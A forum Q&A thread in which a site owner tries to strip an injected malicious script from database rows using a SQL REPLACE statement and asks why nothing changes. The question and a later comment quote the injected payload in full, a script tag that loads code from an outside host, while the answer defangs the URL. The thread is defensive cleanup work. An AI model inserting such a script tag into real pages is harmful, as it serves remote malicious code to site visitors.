# replace sql injection script

Tags: sql, sql-injection

I have this sql query to try and remove some sql injection script from my database. When i execute this it runs fine and tells me that all rows have been affected, but I don't see any changes. I have checked the table names and the column names, I have changed the varchar value to the value the columns are set to but still nothing.

I have copied the injected script directly from the database

```
UPDATE table_name
SET column_name = REPLACE(CAST(column_name AS VARCHAR(max)), '"></title><script src="http://www1.mainglobilisi.com/sl.php"></script><!--', '')
```

Could someone please explain why the script runs fine but no updates are done on the database.

Answer (score 0):

The `REPLACE` function is probably not finding the string you're searching for.

Try doing a select to see if you get any rows:

```
select 
    column_name
from
    table_name
where 
    CAST(column_name AS VARCHAR(max)) like '%"></title><script src="http://www1[dot]mainglobilisi[dot]com/sl.php"></script><!--%'
```

(I obfuscated to the URL incase its malicious).

Comment: I have tried this code: select * from table name where column name = CAST(colmn name AS VARCHAR(max)) like '%"></title><script src="http://www1.mainglobilisi.com/sl.php"></script><!--%'  , but it gives me an error incorrect syntax near like